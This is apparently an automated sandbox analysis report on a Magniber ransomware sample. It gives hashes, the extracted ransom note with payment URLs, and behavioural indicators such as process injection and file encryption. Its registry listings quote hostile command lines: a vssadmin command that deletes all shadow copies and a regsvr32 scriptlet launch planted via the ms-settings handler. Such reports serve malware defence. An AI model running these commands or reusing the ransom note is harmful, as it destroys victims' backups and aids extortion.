magniber | 10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e

Analysis

max time kernel
172s
max time network
184s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
02-05-2022 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.bin.dll
Size

21KB
MD5

a60c5212d52fe1488d2f82989a2947d2
SHA1

0a744d6c76902d28eb6687d66c18b0a354f29b9d
SHA256

10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e
SHA512

afd14daa5bd9448e09f25d561e8be34e16f93a2825129d165e817a4a2a3ffc339efefd6f26e78c4853acfbce7f51c88b81601324b123d8c377d72da15dcf9327

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://8e8058f848685690fedihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://8e8058f848685690fedihlxbl.uponmix.xyz/dihlxbl http://8e8058f848685690fedihlxbl.flysex.space/dihlxbl http://8e8058f848685690fedihlxbl.partscs.site/dihlxbl http://8e8058f848685690fedihlxbl.codehes.uno/dihlxbl Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://8e8058f848685690fedihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl

http://8e8058f848685690fedihlxbl.uponmix.xyz/dihlxbl

http://8e8058f848685690fedihlxbl.flysex.space/dihlxbl

http://8e8058f848685690fedihlxbl.partscs.site/dihlxbl

http://8e8058f848685690fedihlxbl.codehes.uno/dihlxbl

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 40 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5156	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5308	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5300	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5292	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5276	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5284	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5268	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5260	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5252	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5244	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5236	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5188	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5228	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5316	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5220	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5212	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5196	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5204	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5332	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5324	5116	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6712	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6696	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6704	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6688	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6808	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6764	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6728	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6736	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6720	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6744	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6860	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6936	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6980	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6992	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7032	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7128	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7156	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6668	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6240	5116	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6276	5116	vssadmin.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

svchost.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\DisconnectStop.tif => C:\Users\Admin\Pictures\DisconnectStop.tif.dihlxbl	svchost.exe
File opened for modification	C:\Users\Admin\Pictures\WatchShow.tiff	svchost.exe
File renamed	C:\Users\Admin\Pictures\WatchShow.tiff => C:\Users\Admin\Pictures\WatchShow.tiff.dihlxbl	svchost.exe

Suspicious use of SetThreadContext 14 IoCs

Processes:

rundll32.exe

description	pid	process	target process
PID 2516 set thread context of 2340	2516	rundll32.exe	svchost.exe
PID 2516 set thread context of 2352	2516	rundll32.exe	sihost.exe
PID 2516 set thread context of 2488	2516	rundll32.exe	taskhostw.exe
PID 2516 set thread context of 8	2516	rundll32.exe	Explorer.EXE
PID 2516 set thread context of 688	2516	rundll32.exe	svchost.exe
PID 2516 set thread context of 3276	2516	rundll32.exe	DllHost.exe
PID 2516 set thread context of 3384	2516	rundll32.exe	StartMenuExperienceHost.exe
PID 2516 set thread context of 3448	2516	rundll32.exe	RuntimeBroker.exe
PID 2516 set thread context of 3588	2516	rundll32.exe	SearchApp.exe
PID 2516 set thread context of 3796	2516	rundll32.exe	RuntimeBroker.exe
PID 2516 set thread context of 3172	2516	rundll32.exe	RuntimeBroker.exe
PID 2516 set thread context of 3376	2516	rundll32.exe	backgroundTaskHost.exe
PID 2516 set thread context of 4280	2516	rundll32.exe	backgroundTaskHost.exe
PID 2516 set thread context of 4120	2516	rundll32.exe	RuntimeBroker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

3888 3276 WerFault.exe DllHost.exe
4788 3276 WerFault.exe DllHost.exe

pid	pid_target	process	target process
3888	3276	WerFault.exe	DllHost.exe
4788	3276	WerFault.exe	DllHost.exe

Interacts with shadow copies 2 TTPs 20 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
6696	vssadmin.exe
6728	vssadmin.exe
6860	vssadmin.exe
6240	vssadmin.exe
6276	vssadmin.exe
6712	vssadmin.exe
6688	vssadmin.exe
6808	vssadmin.exe
6720	vssadmin.exe
6936	vssadmin.exe
7032	vssadmin.exe
6744	vssadmin.exe
6992	vssadmin.exe
6704	vssadmin.exe
6764	vssadmin.exe
6736	vssadmin.exe
6980	vssadmin.exe
7128	vssadmin.exe
7156	vssadmin.exe
6668	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Internet Explorer\IESettingSync	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE

Modifies registry class 50 IoCs

Processes:

svchost.exeRuntimeBroker.exeStartMenuExperienceHost.exebackgroundTaskHost.exeExplorer.EXEsvchost.exesihost.exerundll32.exeRuntimeBroker.exeRuntimeBroker.exeRuntimeBroker.exetaskhostw.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

3824 notepad.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exe

pid process

2516 rundll32.exe
2516 rundll32.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

8 Explorer.EXE

pid	process
3824	notepad.exe

pid	process
8	Explorer.EXE

Suspicious behavior: MapViewOfSection 14 IoCs

Processes:

rundll32.exe

pid	process
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe
2516	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

StartMenuExperienceHost.exebackgroundTaskHost.exeExplorer.EXEWMIC.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	3384	StartMenuExperienceHost.exe
Token: SeRestorePrivilege	3384	StartMenuExperienceHost.exe
Token: SeTakeOwnershipPrivilege	4280	backgroundTaskHost.exe
Token: SeRestorePrivilege	4280	backgroundTaskHost.exe
Token: SeTakeOwnershipPrivilege	3384	StartMenuExperienceHost.exe
Token: SeRestorePrivilege	3384	StartMenuExperienceHost.exe
Token: SeTakeOwnershipPrivilege	4280	backgroundTaskHost.exe
Token: SeRestorePrivilege	4280	backgroundTaskHost.exe
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeShutdownPrivilege	8	Explorer.EXE
Token: SeCreatePagefilePrivilege	8	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1296	WMIC.exe
Token: SeSecurityPrivilege	1296	WMIC.exe
Token: SeTakeOwnershipPrivilege	1296	WMIC.exe
Token: SeLoadDriverPrivilege	1296	WMIC.exe
Token: SeSystemProfilePrivilege	1296	WMIC.exe
Token: SeSystemtimePrivilege	1296	WMIC.exe
Token: SeProfSingleProcessPrivilege	1296	WMIC.exe
Token: SeIncBasePriorityPrivilege	1296	WMIC.exe
Token: SeCreatePagefilePrivilege	1296	WMIC.exe
Token: SeBackupPrivilege	1296	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

StartMenuExperienceHost.exebackgroundTaskHost.exeDllHost.exesvchost.exeExplorer.EXEtaskhostw.execmd.execmd.execmd.exesihost.execmd.execmd.exesvchost.execmd.exerundll32.execmd.exeRuntimeBroker.execmd.execmd.exe

description	pid	process	target process
PID 3384 wrote to memory of 3840	3384	StartMenuExperienceHost.exe	cmd.exe
PID 3384 wrote to memory of 3840	3384	StartMenuExperienceHost.exe	cmd.exe
PID 3384 wrote to memory of 3840	3384	StartMenuExperienceHost.exe	cmd.exe
PID 3384 wrote to memory of 4556	3384	StartMenuExperienceHost.exe	cmd.exe
PID 3384 wrote to memory of 4556	3384	StartMenuExperienceHost.exe	cmd.exe
PID 3384 wrote to memory of 4556	3384	StartMenuExperienceHost.exe	cmd.exe
PID 4280 wrote to memory of 3492	4280	backgroundTaskHost.exe	cmd.exe
PID 4280 wrote to memory of 3492	4280	backgroundTaskHost.exe	cmd.exe
PID 4280 wrote to memory of 3492	4280	backgroundTaskHost.exe	cmd.exe
PID 4280 wrote to memory of 956	4280	backgroundTaskHost.exe	cmd.exe
PID 4280 wrote to memory of 956	4280	backgroundTaskHost.exe	cmd.exe
PID 4280 wrote to memory of 956	4280	backgroundTaskHost.exe	cmd.exe
PID 3276 wrote to memory of 3888	3276	DllHost.exe	WerFault.exe
PID 3276 wrote to memory of 3888	3276	DllHost.exe	WerFault.exe
PID 2340 wrote to memory of 3824	2340	svchost.exe	notepad.exe
PID 2340 wrote to memory of 3824	2340	svchost.exe	notepad.exe
PID 2340 wrote to memory of 4332	2340	svchost.exe	cmd.exe
PID 2340 wrote to memory of 4332	2340	svchost.exe	cmd.exe
PID 2340 wrote to memory of 4756	2340	svchost.exe	cmd.exe
PID 2340 wrote to memory of 4756	2340	svchost.exe	cmd.exe
PID 2340 wrote to memory of 1220	2340	svchost.exe	cmd.exe
PID 2340 wrote to memory of 1220	2340	svchost.exe	cmd.exe
PID 8 wrote to memory of 1652	8	Explorer.EXE	cmd.exe
PID 8 wrote to memory of 1652	8	Explorer.EXE	cmd.exe
PID 8 wrote to memory of 1988	8	Explorer.EXE	cmd.exe
PID 8 wrote to memory of 1988	8	Explorer.EXE	cmd.exe
PID 2488 wrote to memory of 3404	2488	taskhostw.exe	cmd.exe
PID 2488 wrote to memory of 3404	2488	taskhostw.exe	cmd.exe
PID 2488 wrote to memory of 4944	2488	taskhostw.exe	cmd.exe
PID 2488 wrote to memory of 4944	2488	taskhostw.exe	cmd.exe
PID 1220 wrote to memory of 1296	1220	cmd.exe	WMIC.exe
PID 1220 wrote to memory of 1296	1220	cmd.exe	WMIC.exe
PID 4756 wrote to memory of 3188	4756	cmd.exe	WMIC.exe
PID 4756 wrote to memory of 3188	4756	cmd.exe	WMIC.exe
PID 1652 wrote to memory of 4972	1652	cmd.exe	WMIC.exe
PID 1652 wrote to memory of 4972	1652	cmd.exe	WMIC.exe
PID 2352 wrote to memory of 3208	2352	sihost.exe	cmd.exe
PID 2352 wrote to memory of 3208	2352	sihost.exe	cmd.exe
PID 2352 wrote to memory of 1916	2352	sihost.exe	cmd.exe
PID 2352 wrote to memory of 1916	2352	sihost.exe	cmd.exe
PID 1988 wrote to memory of 4564	1988	cmd.exe	WMIC.exe
PID 1988 wrote to memory of 4564	1988	cmd.exe	WMIC.exe
PID 4944 wrote to memory of 1700	4944	cmd.exe	WMIC.exe
PID 4944 wrote to memory of 1700	4944	cmd.exe	WMIC.exe
PID 688 wrote to memory of 996	688	svchost.exe	cmd.exe
PID 688 wrote to memory of 996	688	svchost.exe	cmd.exe
PID 688 wrote to memory of 2260	688	svchost.exe	cmd.exe
PID 688 wrote to memory of 2260	688	svchost.exe	cmd.exe
PID 3404 wrote to memory of 3464	3404	cmd.exe	WMIC.exe
PID 3404 wrote to memory of 3464	3404	cmd.exe	WMIC.exe
PID 2516 wrote to memory of 3608	2516	rundll32.exe	cmd.exe
PID 2516 wrote to memory of 3608	2516	rundll32.exe	cmd.exe
PID 2516 wrote to memory of 2560	2516	rundll32.exe	cmd.exe
PID 2516 wrote to memory of 2560	2516	rundll32.exe	cmd.exe
PID 1916 wrote to memory of 940	1916	cmd.exe	WMIC.exe
PID 1916 wrote to memory of 940	1916	cmd.exe	WMIC.exe
PID 3448 wrote to memory of 632	3448	RuntimeBroker.exe	cmd.exe
PID 3448 wrote to memory of 632	3448	RuntimeBroker.exe	cmd.exe
PID 2260 wrote to memory of 1852	2260	cmd.exe	WMIC.exe
PID 2260 wrote to memory of 1852	2260	cmd.exe	WMIC.exe
PID 3448 wrote to memory of 4888	3448	RuntimeBroker.exe	cmd.exe
PID 3448 wrote to memory of 4888	3448	RuntimeBroker.exe	cmd.exe
PID 3208 wrote to memory of 4032	3208	cmd.exe	WMIC.exe
PID 3208 wrote to memory of 4032	3208	cmd.exe	WMIC.exe

